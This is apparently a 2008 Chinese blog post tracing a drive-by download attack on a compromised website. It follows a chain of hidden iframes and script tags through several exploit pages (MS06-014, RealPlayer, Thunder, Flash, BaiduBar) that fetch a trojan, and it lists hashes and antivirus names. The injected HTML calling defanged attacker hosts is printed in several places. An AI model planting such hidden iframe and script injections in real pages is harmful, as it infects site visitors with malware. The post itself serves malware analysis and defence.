某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small

某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small

endurer 原创
2008-06-02 第1

该网站包含代码:
/---
<iframe src=hxxp://www.m**m*e*x*e**.com/alexa.html width=0 height=0></iframe>
---/

#1 hxxp://www.m**m*e*x*e**.com/alexa.html 内容为:
/---
<script language="javascript" type="text/javascript">
window.location="hxxp://www.u**i**u**ou.net/6.htm";
</script>
---/

#1.1 hxxp://www.u**i**u**ou.net/6.htm包含代码:
/---
<iframe src=news.html width=100 height=0></iframe>
---/

#1.1.1 hxxp://www.u**i**u**ou.net/news.html

在解密过程卡巴斯基已检测到: 木马程序 Trojan-Downloader.JS.Agent.byj

输出代码:
/---
<script src=hxxp://*fuck**.g**o-*3**6*0*.net/ms06014.js></script>
<EMBED src=hxxp://*fuck**.g**o-*3**6*0*.net/versionff.swf width=0 height=0>
<iframe style=display:none src="hxxp://*fuck**.g**o-*3**6*0*.net/GLWORLD.html"></iframe>
<sCrIpT LAnGuAgE="jAvAsCrIpT" src=hxxp://*fuck**.g**o-*3**6*0*.net/real.js></script>
<iframe style=display:none src="hxxp://*fuck**.g**o-*3**6*0*.net/Real.html"></iframe>
<iframe width=100 height=0 src=hxxp://*fuck**.g**o-*3**6*0*.net/Thunder.html></iframe>
---/

#1.1.1.1 hxxp://*fuck**.g**o-*3**6*0*.net/ms06014.js(卡巴斯基已检测到: 木马程序 Trojan-Downloader.JS.Small.lw

利用MS06-014漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

文件说明符 : D:/test/bak.css
属性 : A---
M$签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-6-2 12:13:57
修改时间 : 2008-6-2 12:13:57
大小 : 13840 字节 13.528 KB
MD5 : 7806c353c9643b85d9a7229be7273de0
SHA1: A37F4233AD1EBC1548C65B041491A7004454D413
CRC32: 2ae34afc

卡巴斯基报为 Trojan-Downloader.Win32.Small.iyq,瑞星报为 Trojan.DL.Win32.Mnless.agu

#1.1.1.2 hxxp://*fuck**.g**o-*3**6*0*.net/GLWORLD.html

利用联众游戏(GLIEDown.IEDown.1,clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.3 hxxp://*fuck**.g**o-*3**6*0*.net/real.js

利用RealPlayer(IERPCtl.IERPCtl.1,clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.4 hxxp://*fuck**.g**o-*3**6*0*.net/Real.html

利用RealPlayer(IERPCtl.IERPCtl.1,clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.5 hxxp://*fuck**.g**o-*3**6*0*.net/Thunder.html
利用迅雷(DPClient.Vod,clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F
)漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.6 hxxp://*fuck**.g**o-*3**6*0*.net/versionie.swf
利用Flash(ShockwaveFlash.ShockwaveFlash.9)漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

文件说明符 : D:/test/versionie.swf
属性 : A---
M$签名:否
PE文件:否
获取文件版本信息大小失败!
创建时间 : 2008-6-2 12:13:56
修改时间 : 2008-6-2 12:35:34
大小 : 133 字节
MD5 : e1bc4891359a7a8b4aabc837593860be
SHA1: 4A177911641401A58C22D00545A67B91EBB79E66
CRC32: 9e64316f

卡巴斯基报为:Trojan-Downloader.SWF.Small.bb

#1.1.1.7 利用 BaiduBar.Tool 下载 hxxp://*fuck**.g**o-*3**6*0*.net/Baidu.cab,内含 Baidu.exe

阅读更多

没有更多推荐了,返回首页